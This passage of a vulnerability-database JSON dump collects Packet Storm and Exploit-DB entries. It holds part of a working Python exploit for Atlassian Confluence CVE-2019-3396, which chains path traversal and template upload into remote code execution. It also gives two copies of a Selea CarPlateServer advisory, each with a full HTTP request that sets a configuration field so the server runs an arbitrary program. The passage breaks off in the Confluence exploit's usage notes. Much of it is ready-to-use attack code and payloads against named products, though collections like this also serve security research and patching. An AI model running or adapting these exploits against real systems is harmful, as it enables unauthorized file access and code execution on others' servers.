(file ID) for uploaded file link\") \nself._file_id = file_link_element[\"data-linked-resource-id\"] \nlog.debug(f\"found file ID: {self._file_id}\") \n \n \ndef exploit_path_traversal(config): \n\"\"\" \nThis sends one request towards vulnerable server to either get local file content or directory listing. \n\"\"\" \nlog.debug(\"running path traversal exploit\") \n \nexploit = Exploit(config) \nexploit.path_traversal(config.remote_path) \n \n \ndef exploit_rce(config): \n\"\"\"This executes multiple steps to gain RCE. Requires a session token. \n \nSteps: \n1. find personal space key for the user \n2. find personal space ID and homepage ID for the user \n3. get CSRF token (generated per session) \n4. upload template file with Java code (involves two requests, first one is 302 redirection) \n5. use path traversal part of exploit to load and execute local template file \n6. profit \n\"\"\" \nlog.debug(\"running RCE exploit\") \n \nexploit = Exploit(config) \nexploit.find_personal_space_key() \nexploit.find_personal_space_id_and_homepage_id() \nexploit.get_csrf_token() \nexploit.upload_template() \npayload_location = exploit.generate_payload_location() \nexploit.path_traversal(payload_location, decode_output=True) \n \n \nif __name__ == \"__main__\": \n# parse arguments and load all configuration items \nscript_arguments = parse_arguments() \nlog = Configuration.get_logger(script_arguments.verbosity) \n \nconfiguration = Configuration(script_arguments) \n \n# printing banner \nif not configuration.script_arguments.skip_banner: \nprint_banner() \n \nif script_arguments.quiet: \nlog.disabled = True \n \nlog.debug(\"finished parsing CLI arguments\") \nlog.debug(\"configuration was loaded successfully\") \nlog.debug(\"starting exploit\") \n \n# disabling warning about trusting self sign certificate from python requests \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \n# run appropriate function depending on mode \nconfiguration.script_arguments.func(configuration) \n \nlog.debug(\"done!\") \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161065/atlassiancwcm-inject.txt"}, {"lastseen": "2021-01-22T15:44:01", "description": "", "published": "2021-01-22T00:00:00", "type": "packetstorm", "title": "Selea CarPlateServer 4.0.1.6 Remote Program Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161068", "href": "https://packetstormsecurity.com/files/161068/Selea-CarPlateServer-4.0.1.6-Remote-Program-Execution.html", "sourceData": "` \nSelea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution \n \n \nVendor: Selea s.r.l. \nProduct web page: https://www.selea.com \nAffected version: 4.0.1.6(210120) \n4.013(201105) \n3.100(200225) \n3.005(191206) \n3.005(191112) \n \nSummary: Our CPS (Car Plate Server) software is an advanced solution that can \nbe installed on computers and servers and used as an operations centre. It can \ncreate sophisticated traffic control and road safety systems connecting to \nstationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert \nnotifications directly to tablets or smartphones, it can receive and transfer \ndata through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution \nthat offers full integration with main video surveillance software. Our CPS \nsoftware connects to the national operations centre and provides law enforcement \nauthorities with necessary tools to issue alerts. CPS is designed to guarantee \ncooperation among different law enforcement agencies. It allows to create a \nmulti-user environment that manages different hierarchy levels and the related \ndivision of competences. \n \nDesc: The server suffers from an arbitrary win32/64 binary executable execution \nwhen setting the NO_LIST_EXE_PATH variable to a program of choice. The command \nwill be executed if proper trigger criteria is met. It can be exploited via CSRF \nor by navigating to /cps/ endpoint from the camera IP and bypass authentication \ngaining the ability to modify the running configuration including changing the \npassword of admin and other users. \n \nTested on: Microsoft Windows 10 Enterprise \nSeleaCPSHttpServer/1.1 \n \n \nVulnerability discovered by Gjoko 'LiquidWorm' Krstic \n@zeroscience \n \n \nAdvisory ID: ZSL-2021-5622 \nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php \n \n \n08.11.2020 \n \n-- \n \n \nPOST /config_request?ACTION=WRITE HTTP/1.1 \nHost: localhost:8080 \nConnection: keep-alive \nContent-Length: 6309 \nAuthorization: Basic ZmFrZTpmYWtl \nAccept: application/json, text/plain, */* \nLoginMode: angular \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75 \nAuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a \ncontent-type: application/json \nOrigin: http://localhost:8080 \nSec-Fetch-Site: same-origin \nSec-Fetch-Mode: cors \nSec-Fetch-Dest: empty \nReferer: http://localhost:8080/ \nAccept-Encoding: gzip, deflate, br \nAccept-Language: en-US,en;q=0.9 \n \n \n{ \n\"ACTIONS\": { \n\"ANIA_LIST_DAYS_NUM\": \"15\", \n\"ANIA_LIST_PWD\": \"\", \n\"ANIA_LIST_USER\": \"{B64valuehereommited}\", \n\"BLACK_LIST_COUNTRY\": \"\", \n\"EXACT_MATCH\": \"false\", \n\"FUZZY_MATCH\": \"true\", \n\"MINISTEROTRASPORTI_LIST_DAYS_NUM\": \"15\", \n\"MINISTEROTRASPORTI_LIST_ENABLE_CHECK\": \"0,1\", \n\"MINISTEROTRASPORTI_LIST_GET_OWNERS\": \"false\", \n\"MINISTEROTRASPORTI_LIST_PWD\": \"\", \n\"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE\": \"false\", \n\"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION\": \"false\", \n\"MINISTEROTRASPORTI_LIST_USER\": \"\", \n\"MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER\": \"false\", \n\"MINISTEROTRASPORTI_LIST_USE_VPN\": \"true\", \n\"MINISTEROTRASPORTI_LIST_VPN_PASSWORD\": \"\", \n\"MINISTEROTRASPORTI_LIST_VPN_USERNAME\": \"\", \n\"MINISTERO_LIST_DAYS_NUM\": \"24\", \n\"MINISTERO_LIST_PWD\": \"\", \n\"MINISTERO_LIST_USER\": \"\", \n\"NO_LIST_ENABLED\": \"true\", \n\"NO_LIST_ENABLE_EXE\": \"true\", \n\"NO_LIST_EXE_PATH\": \"C:/windows/system32/calc.exe\", \n\"NO_LIST_HTTP\": \"http://localhost:8080/$TRIGGER_EXE_VAR\", \n\"NO_LIST_HTTP_ENABLED\": \"false\", \n\"NO_LIST_SEND_TCP_ALARM\": \"\", \n\"PERMISSIVE_MATCH\": \"true\", \n\"WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO\": \"\" \n}, \n\"CAMERAINFO\": { \n\"BA__________\": { \n\"APPROACHING\": \"\", \n\"CustomCameraId\": \"\", \n\"CustomGateId\": \"\", \n\"DetectDesc\": \"ZSL\", \n\"DetectId\": \"\", \n\"Direction\": \"\", \n\"GPSLocation\": \"\", \n\"GateDesc\": \"3\", \n\"GateId\": \"\", \n\"LEAVING\": \"\", \n\"ZoneName\": \"\", \n\"setname\": \"false\", \n\"skip\": \"false\" \n} \n}, \n\"CONTEXT\": { \n\"BA__________\": { \n\"URL\": [ \n\"https://www.zeroscience.mk\" \n] \n} \n}, \n\"DBMS\": { \n\"DB_NAME\": \"\", \n\"DB_PASSWORD\": \"\", \n\"DB_SERVER\": \"\", \n\"DB_TYPE\": \"sqlite\", \n\"DB_USERNAME\": \"\", \n\"ENCRYPT_DB\": \"false\", \n\"SQLITE_MAX_MB_RAM_CACHE\": \"-1\" \n}, \n\"EMAIL\": { \n\"DEST\": \"\", \n\"FROM_EMAIL\": \"\", \n\"FROM_NAME\": \"\", \n\"LOG_USER_SEARCH\": \"false\", \n\"MIN_EMAIL_TIME\": \"5\", \n\"PASSWORD\": \"\", \n\"PORT\": \"25\", \n\"SEND_EMAIL_ON_TAMPER\": \"false\", \n\"SERVER\": \"\", \n\"SSL\": \"false\", \n\"USERNAME\": \"\", \n\"XOAUTH2\": \"false\" \n}, \n\"EMAIL-XOAUTH2\": { \n\"refresh_token\": \"\" \n}, \n\"EZ_CLIENTS\": { \n\"PASSWORD\": \"\", \n\"SLAVES\": \"\", \n\"USERNAME\": \"\", \n\"USE_CNTLM\": \"false\", \n\"WANT_CTX\": \"false\" \n}, \n\"EZ_CLIENT_SCNTT\": { \n\"CTX\": \"true\", \n\"HOST\": \"\", \n\"PASSWORD\": \"\", \n\"PORT\": \"443\", \n\"USERNAME\": \"\" \n}, \n\"FTPSYNC\": { \n\"DELETE_OLD_SYNC_DAYS\": \"7\", \n\"JSON_CONFIG\": \"eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==\", \n\"SAVE_FTP_SEND_ERRORS\": \"true\" \n}, \n\"GLOBAL_HTTP_PROXY\": { \n\"CNTLM_ENABLED\": \"false\", \n\"EZ_ADDRESS\": \"cps.selea.com\", \n\"EZ_PORT\": \"8999\", \n\"HOST\": \"\", \n\"NON_PROXY_HOST\": \"localhost|^(10|127|169\\\\.254|172\\\\.1[6-9]|172\\\\.2[0-9]|172\\\\.3[0-1]|192\\\\.168)\\\\..+\", \n\"PASSWORD\": \"\", \n\"PORT\": \"\", \n\"PROXY_ENABLED\": \"true\", \n\"USERNAME\": \"\" \n}, \n\"HTTPS\": { \n\"CERTIFICATE\": \"\", \n\"ENABLE_HTTP2\": \"true\", \n\"GET_CERTIFICATE_FROM_SELEA\": \"false\", \n\"PRIVATE_KEY\": \"\", \n\"ROOT_CERTIFICATE\": \"\" \n}, \n\"MASTER_CPS\": { \n\"ENABLED\": \"true\", \n\"MASTERS\": \"\", \n\"PASSWORD\": \"\", \n\"USERNAME\": \"\" \n}, \n\"PROXY_TCP\": { \n\"ENABLED\": \"false\", \n\"USE_HTTP_PROXY\": \"false\" \n}, \n\"REMOTE_LIST\": { \n\"ADDRESS\": \"\", \n\"ENABLED\": \"false\", \n\"PASSWORD\": \"\", \n\"PORT\": \"\", \n\"USERNAME\": \"\" \n}, \n\"REPORT\": { \n\"STATS_AGGREGATE\": \"true\", \n\"STATS_ENABLED\": \"false\", \n\"STATS_FREQ\": \"MONTH\", \n\"STATS_PATH\": \"\", \n\"STATS_SELECTED\": \"\", \n\"STATS_WEEK_DAY\": \"Mon\" \n}, \n\"SCNTT\": { \n\"LIST_A1_DAYS_LIMIT\": \"0\", \n\"SCNTT_PASSWORD\": \"\", \n\"SCNTT_PRIV_KEY_FILENAME\": \"\", \n\"SCNTT_PUB_CERT\": \"\", \n\"SCNTT_SYSTEM_DESC\": \"\", \n\"SCNTT_SYSTEM_ID\": \"\", \n\"SCNTT_USERNAME\": \"\" \n}, \n\"SETTINGS\": { \n\"ALLOW_FLASH_NOTIFICATIONS\": \"true\", \n\"AUTO_UPDATE\": \"true\", \n\"BACKUP_AT_SPECIFIC_HOUR\": \"-1\", \n\"BACKUP_DB_PATH\": \"\", \n\"BACKUP_EVERY_HOURS\": \"0\", \n\"CARPLATE_DETAILS_ENABLED\": \"false\", \n\"CHECK_EXPIRING_CARPLATES\": \"false\", \n\"CHECK_EXPIRING_CARPLATES_DAYS\": \"7\", \n\"CHECK_FILENAME_SYNTAX\": \"true\", \n\"DB_DELETE_DAYS\": \"90\", \n\"DB_DELETE_ENABLE\": \"false\", \n\"DB_DELETE_LOG_DAYS\": \"7\", \n\"DB_DELETE_OCR_FILE\": \"90\", \n\"DB_STATS_DELETE_DAYS\": \"90\", \n\"DISABLE_WHITELIST_REMOTE_DB_CHECK\": \"false\", \n\"ENCRYPT_IMAGES\": \"false\", \n\"FREE_DISK_LIMIT\": \"1000\", \n\"FRIENDLY_NAME\": \"test\", \n\"FTP_CUSTOM_PORT_RANGE\": \"false\", \n\"FTP_DOWNLOAD_DISABLED\": \"true\", \n\"FTP_ENABLED\": \"true\", \n\"FTP_EXTERN_IP\": \"\", \n\"FTP_EXTERN_IP_AUTO\": \"false\", \n\"FTP_LIST_DIR_DISABLED\": \"true\", \n\"FTP_MAX_PORT\": \"0\", \n\"FTP_MIN_PORT\": \"0\", \n\"FTP_PORT\": \"21\", \n\"FTP_USERS\": \"\", \n\"FTP_USE_FTPS\": \"true\", \n\"HTTP2_PORT\": \"8081\", \n\"HTTP_PASSWORD\": \"CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU\", \n\"HTTP_PORT\": \"8080\", \n\"HTTP_USERNAME\": \"admin\", \n\"IGNORE_CONTEXT_FOR_UNREADFAKE\": \"false\", \n\"IGNORE_IF_NOT_SYNTAX_MATCH\": \"false\", \n\"MILESTONE_CONNECTIONS\": \"5\", \n\"MILESTONE_ENABLED\": \"true\", \n\"MILESTONE_ENABLE_ACTIVE_CONNECTION\": \"false\", \n\"MILESTONE_PORT\": \"5666\", \n\"MILESTON_REMOTE_IP\": \"\", \n\"MILESTON_REMOTE_PORT\": \"8080\", \n\"MIN_LOG_LEVEL\": \"0\", \n\"PERIODIC_BACKUP_CONFIG\": \"0\", \n\"REMOVE_BLACK_LIST_ON_EXPIRE\": \"true\", \n\"REMOVE_NON_ALARM_CARPLATE\": \"false\", \n\"REMOVE_WHITE_LIST_ON_EXPIRE\": \"true\", \n\"SAVE_GATEWAY_SEND_ERRORS\": \"true\", \n\"SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS\": \"7\", \n\"SEND_EMAIL_ON_LOST_CONNECTION\": \"false\", \n\"SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME\": \"600\", \n\"SEND_EMAIL_ON_NO_PLATE_READ\": \"false\", \n\"SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME\": \"12\", \n\"SERVER_NTP_ON\": \"false\", \n\"SERVER_NTP_PORT\": \"123\", \n\"USE_HTTPS\": \"false\" \n}, \n\"VPNC\": { \n\"VPN_NET_NAME\": \"\" \n}, \n\"TCP_TEMPLATES\": [] \n} \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161068/ZSL-2021-5622.txt"}], "exploitdb": [{"lastseen": "2021-01-22T09:06:45", "description": "", "published": "2021-01-22T00:00:00", "type": "exploitdb", "title": "Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-22T00:00:00", "id": "EDB-ID:49452", "href": "https://www.exploit-db.com/exploits/49452", "sourceData": "# Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution\r\n# Date: 08.11.2020\r\n# Exploit Author: LiquidWorm\r\n# Vendor Homepage: https://www.selea.com\r\n\r\nSelea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution\r\n\r\n\r\nVendor: Selea s.r.l.\r\nProduct web page: https://www.selea.com\r\nAffected version: 4.0.1.6(210120)\r\n 4.013(201105)\r\n 3.100(200225)\r\n 3.005(191206)\r\n 3.005(191112)\r\n\r\nSummary: Our CPS (Car Plate Server) software is an advanced solution that can\r\nbe installed on computers and servers and used as an operations centre. It can\r\ncreate sophisticated traffic control and road safety systems connecting to\r\nstationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert\r\nnotifications directly to tablets or smartphones, it can receive and transfer\r\ndata through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution\r\nthat offers full integration with main video surveillance software. Our CPS\r\nsoftware connects to the national operations centre and provides law enforcement\r\nauthorities with necessary tools to issue alerts. CPS is designed to guarantee\r\ncooperation among different law enforcement agencies. It allows to create a\r\nmulti-user environment that manages different hierarchy levels and the related\r\ndivision of competences.\r\n\r\nDesc: The server suffers from an arbitrary win32/64 binary executable execution\r\nwhen setting the NO_LIST_EXE_PATH variable to a program of choice. The command\r\nwill be executed if proper trigger criteria is met. It can be exploited via CSRF\r\nor by navigating to /cps/ endpoint from the camera IP and bypass authentication\r\ngaining the ability to modify the running configuration including changing the\r\npassword of admin and other users.\r\n\r\nTested on: Microsoft Windows 10 Enterprise\r\n SeleaCPSHttpServer/1.1\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2021-5622\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php\r\n\r\n\r\n08.11.2020\r\n\r\n--\r\n\r\n\r\nPOST /config_request?ACTION=WRITE HTTP/1.1\r\nHost: localhost:8080\r\nConnection: keep-alive\r\nContent-Length: 6309\r\nAuthorization: Basic ZmFrZTpmYWtl\r\nAccept: application/json, text/plain, */*\r\nLoginMode: angular\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75\r\nAuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a\r\ncontent-type: application/json\r\nOrigin: http://localhost:8080\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Dest: empty\r\nReferer: http://localhost:8080/\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\n\r\n\r\n{\r\n \"ACTIONS\": {\r\n \"ANIA_LIST_DAYS_NUM\": \"15\",\r\n \"ANIA_LIST_PWD\": \"\",\r\n \"ANIA_LIST_USER\": \"{B64valuehereommited}\",\r\n \"BLACK_LIST_COUNTRY\": \"\",\r\n \"EXACT_MATCH\": \"false\",\r\n \"FUZZY_MATCH\": \"true\",\r\n \"MINISTEROTRASPORTI_LIST_DAYS_NUM\": \"15\",\r\n \"MINISTEROTRASPORTI_LIST_ENABLE_CHECK\": \"0,1\",\r\n \"MINISTEROTRASPORTI_LIST_GET_OWNERS\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_PWD\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_USER\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_USE_VPN\": \"true\",\r\n \"MINISTEROTRASPORTI_LIST_VPN_PASSWORD\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_VPN_USERNAME\": \"\",\r\n \"MINISTERO_LIST_DAYS_NUM\": \"24\",\r\n \"MINISTERO_LIST_PWD\": \"\",\r\n \"MINISTERO_LIST_USER\": \"\",\r\n \"NO_LIST_ENABLED\": \"true\",\r\n \"NO_LIST_ENABLE_EXE\": \"true\",\r\n \"NO_LIST_EXE_PATH\": \"C:/windows/system32/calc.exe\",\r\n \"NO_LIST_HTTP\": \"http://localhost:8080/$TRIGGER_EXE_VAR\",\r\n \"NO_LIST_HTTP_ENABLED\": \"false\",\r\n \"NO_LIST_SEND_TCP_ALARM\": \"\",\r\n \"PERMISSIVE_MATCH\": \"true\",\r\n \"WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO\": \"\"\r\n },\r\n \"CAMERAINFO\": {\r\n \"BA__________\": {\r\n \"APPROACHING\": \"\",\r\n \"CustomCameraId\": \"\",\r\n \"CustomGateId\": \"\",\r\n \"DetectDesc\": \"ZSL\",\r\n \"DetectId\": \"\",\r\n \"Direction\": \"\",\r\n \"GPSLocation\": \"\",\r\n \"GateDesc\": \"3\",\r\n \"GateId\": \"\",\r\n \"LEAVING\": \"\",\r\n \"ZoneName\": \"\",\r\n \"setname\": \"false\",\r\n \"skip\": \"false\"\r\n }\r\n },\r\n \"CONTEXT\": {\r\n \"BA__________\": {\r\n \"URL\": [\r\n \"https://www.zeroscience.mk\"\r\n ]\r\n }\r\n },\r\n \"DBMS\": {\r\n \"DB_NAME\": \"\",\r\n \"DB_PASSWORD\": \"\",\r\n \"DB_SERVER\": \"\",\r\n \"DB_TYPE\": \"sqlite\",\r\n \"DB_USERNAME\": \"\",\r\n \"ENCRYPT_DB\": \"false\",\r\n \"SQLITE_MAX_MB_RAM_CACHE\": \"-1\"\r\n },\r\n \"EMAIL\": {\r\n \"DEST\": \"\",\r\n \"FROM_EMAIL\": \"\",\r\n \"FROM_NAME\": \"\",\r\n \"LOG_USER_SEARCH\": \"false\",\r\n \"MIN_EMAIL_TIME\": \"5\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"25\",\r\n \"SEND_EMAIL_ON_TAMPER\": \"false\",\r\n \"SERVER\": \"\",\r\n \"SSL\": \"false\",\r\n \"USERNAME\": \"\",\r\n \"XOAUTH2\": \"false\"\r\n },\r\n \"EMAIL-XOAUTH2\": {\r\n \"refresh_token\": \"\"\r\n },\r\n \"EZ_CLIENTS\": {\r\n \"PASSWORD\": \"\",\r\n \"SLAVES\": \"\",\r\n \"USERNAME\": \"\",\r\n \"USE_CNTLM\": \"false\",\r\n \"WANT_CTX\": \"false\"\r\n },\r\n \"EZ_CLIENT_SCNTT\": {\r\n \"CTX\": \"true\",\r\n \"HOST\": \"\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"443\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"FTPSYNC\": {\r\n \"DELETE_OLD_SYNC_DAYS\": \"7\",\r\n \"JSON_CONFIG\": \"eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==\",\r\n \"SAVE_FTP_SEND_ERRORS\": \"true\"\r\n },\r\n \"GLOBAL_HTTP_PROXY\": {\r\n \"CNTLM_ENABLED\": \"false\",\r\n \"EZ_ADDRESS\": \"cps.selea.com\",\r\n \"EZ_PORT\": \"8999\",\r\n \"HOST\": \"\",\r\n \"NON_PROXY_HOST\": \"localhost|^(10|127|169\\\\.254|172\\\\.1[6-9]|172\\\\.2[0-9]|172\\\\.3[0-1]|192\\\\.168)\\\\..+\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"\",\r\n \"PROXY_ENABLED\": \"true\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"HTTPS\": {\r\n \"CERTIFICATE\": \"\",\r\n \"ENABLE_HTTP2\": \"true\",\r\n \"GET_CERTIFICATE_FROM_SELEA\": \"false\",\r\n \"PRIVATE_KEY\": \"\",\r\n \"ROOT_CERTIFICATE\": \"\"\r\n },\r\n \"MASTER_CPS\": {\r\n \"ENABLED\": \"true\",\r\n \"MASTERS\": \"\",\r\n \"PASSWORD\": \"\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"PROXY_TCP\": {\r\n \"ENABLED\": \"false\",\r\n \"USE_HTTP_PROXY\": \"false\"\r\n },\r\n \"REMOTE_LIST\": {\r\n \"ADDRESS\": \"\",\r\n \"ENABLED\": \"false\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"REPORT\": {\r\n \"STATS_AGGREGATE\": \"true\",\r\n \"STATS_ENABLED\": \"false\",\r\n \"STATS_FREQ\": \"MONTH\",\r\n \"STATS_PATH\": \"\",\r\n \"STATS_SELECTED\": \"\",\r\n \"STATS_WEEK_DAY\": \"Mon\"\r\n },\r\n \"SCNTT\": {\r\n \"LIST_A1_DAYS_LIMIT\": \"0\",\r\n \"SCNTT_PASSWORD\": \"\",\r\n \"SCNTT_PRIV_KEY_FILENAME\": \"\",\r\n \"SCNTT_PUB_CERT\": \"\",\r\n \"SCNTT_SYSTEM_DESC\": \"\",\r\n \"SCNTT_SYSTEM_ID\": \"\",\r\n \"SCNTT_USERNAME\": \"\"\r\n },\r\n \"SETTINGS\": {\r\n \"ALLOW_FLASH_NOTIFICATIONS\": \"true\",\r\n \"AUTO_UPDATE\": \"true\",\r\n \"BACKUP_AT_SPECIFIC_HOUR\": \"-1\",\r\n \"BACKUP_DB_PATH\": \"\",\r\n \"BACKUP_EVERY_HOURS\": \"0\",\r\n \"CARPLATE_DETAILS_ENABLED\": \"false\",\r\n \"CHECK_EXPIRING_CARPLATES\": \"false\",\r\n \"CHECK_EXPIRING_CARPLATES_DAYS\": \"7\",\r\n \"CHECK_FILENAME_SYNTAX\": \"true\",\r\n \"DB_DELETE_DAYS\": \"90\",\r\n \"DB_DELETE_ENABLE\": \"false\",\r\n \"DB_DELETE_LOG_DAYS\": \"7\",\r\n \"DB_DELETE_OCR_FILE\": \"90\",\r\n \"DB_STATS_DELETE_DAYS\": \"90\",\r\n \"DISABLE_WHITELIST_REMOTE_DB_CHECK\": \"false\",\r\n \"ENCRYPT_IMAGES\": \"false\",\r\n \"FREE_DISK_LIMIT\": \"1000\",\r\n \"FRIENDLY_NAME\": \"test\",\r\n \"FTP_CUSTOM_PORT_RANGE\": \"false\",\r\n \"FTP_DOWNLOAD_DISABLED\": \"true\",\r\n \"FTP_ENABLED\": \"true\",\r\n \"FTP_EXTERN_IP\": \"\",\r\n \"FTP_EXTERN_IP_AUTO\": \"false\",\r\n \"FTP_LIST_DIR_DISABLED\": \"true\",\r\n \"FTP_MAX_PORT\": \"0\",\r\n \"FTP_MIN_PORT\": \"0\",\r\n \"FTP_PORT\": \"21\",\r\n \"FTP_USERS\": \"\",\r\n \"FTP_USE_FTPS\": \"true\",\r\n \"HTTP2_PORT\": \"8081\",\r\n \"HTTP_PASSWORD\": \"CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU\",\r\n \"HTTP_PORT\": \"8080\",\r\n \"HTTP_USERNAME\": \"admin\",\r\n \"IGNORE_CONTEXT_FOR_UNREADFAKE\": \"false\",\r\n \"IGNORE_IF_NOT_SYNTAX_MATCH\": \"false\",\r\n \"MILESTONE_CONNECTIONS\": \"5\",\r\n \"MILESTONE_ENABLED\": \"true\",\r\n \"MILESTONE_ENABLE_ACTIVE_CONNECTION\": \"false\",\r\n \"MILESTONE_PORT\": \"5666\",\r\n \"MILESTON_REMOTE_IP\": \"\",\r\n \"MILESTON_REMOTE_PORT\": \"8080\",\r\n \"MIN_LOG_LEVEL\": \"0\",\r\n \"PERIODIC_BACKUP_CONFIG\": \"0\",\r\n \"REMOVE_BLACK_LIST_ON_EXPIRE\": \"true\",\r\n \"REMOVE_NON_ALARM_CARPLATE\": \"false\",\r\n \"REMOVE_WHITE_LIST_ON_EXPIRE\": \"true\",\r\n \"SAVE_GATEWAY_SEND_ERRORS\": \"true\",\r\n \"SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS\": \"7\",\r\n \"SEND_EMAIL_ON_LOST_CONNECTION\": \"false\",\r\n \"SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME\": \"600\",\r\n \"SEND_EMAIL_ON_NO_PLATE_READ\": \"false\",\r\n \"SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME\": \"12\",\r\n \"SERVER_NTP_ON\": \"false\",\r\n \"SERVER_NTP_PORT\": \"123\",\r\n \"USE_HTTPS\": \"false\"\r\n },\r\n \"VPNC\": {\r\n \"VPN_NET_NAME\": \"\"\r\n },\r\n \"TCP_TEMPLATES\": []\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49452"}, {"lastseen": "2021-01-22T13:11:44", "description": "", "published": "2021-01-22T00:00:00", "type": "exploitdb", "title": "Atlassian Confluence Widget Connector Macro - SSTI", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2021-01-22T00:00:00", "id": "EDB-ID:49465", "href": "https://www.exploit-db.com/exploits/49465", "sourceData": "# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI \r\n# Date: 21-Jan-2021\r\n# Exploit Author: 46o60\r\n# Vendor Homepage: https://www.atlassian.com/software/confluence\r\n# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin\r\n# Version: 6.12.1\r\n# Tested on: Ubuntu 20.04.1 LTS\r\n# CVE : CVE-2019-3396\r\n\r\n#!/usr/bin/env python3\r\n# -*- coding: UTF-8 -*-\r\n\"\"\"\r\n\r\nExploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian\r\nConfluence Server server-side template injection.\r\n\r\nVulnerability information:\r\n Authors:\r\n Daniil Dmitriev - Discovering vulnerability\r\n Dmitry (rrock) Shchannikov - Metasploit module\r\n Exploit\r\n ExploitDB:\r\n https://www.exploit-db.com/exploits/46731\r\n Metasploit\r\n https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/\r\n exploit/multi/http/confluence_widget_connector\r\n\r\nWhile Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made\r\nfrom the target Confluence server towards attacker's server where the Velocity template with the payload is being\r\nhosted. If this is not possible, for example, because network where the target Confluence server is located filters all\r\noutbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this\r\nalternative approach by first uploading the template to the server and then loading it with original vulnerability from\r\nlocal file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any\r\nuser can upload a file to the server by attaching the file to his \"personal space\".\r\n\r\nThere are two modes of the exploit:\r\n 1. Exploiting path traversal for file disclosure and directory listings.\r\n 2. RCE by uploading a template file with payload to the server.\r\n\r\nIn case where network is filtered and loading remote template is not possible and also you do not have a low-privileged\r\nuser session, you can still exploit the '_template' parameter to browse the server file system by using the first mode\r\nof this exploit. Conveniently, application returns file content as well as directory listing depending on to what path\r\nis pointing to. As in original exploit no authentication is needed for this mode.\r\n\r\nLimitations of path traversal exploit:\r\n- not possible to distinguish between non-existent path and lack of permissions\r\n- no distinction between files and directories in the output\r\n\r\nIf you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A\r\nregular user probably has enough privileges for this since each user can have their own personal space where they\r\nshould be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not\r\nexists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file\r\nwith payload from local filesystem instead from remote system.\r\n\r\nPrerequisite of RCE in this exploit:\r\n- authenticated session is needed\r\n- knowledge of where attached files are stored on the file system - if it is not default location then use first mode\r\nto find it, should be in Confluence install directory under ./attachments subdirectory\r\n\r\nUsage\r\n- list /etc folder on Confluence server hosted on http://confluence.example.com\r\n python exploit.py -th confluence.example.com 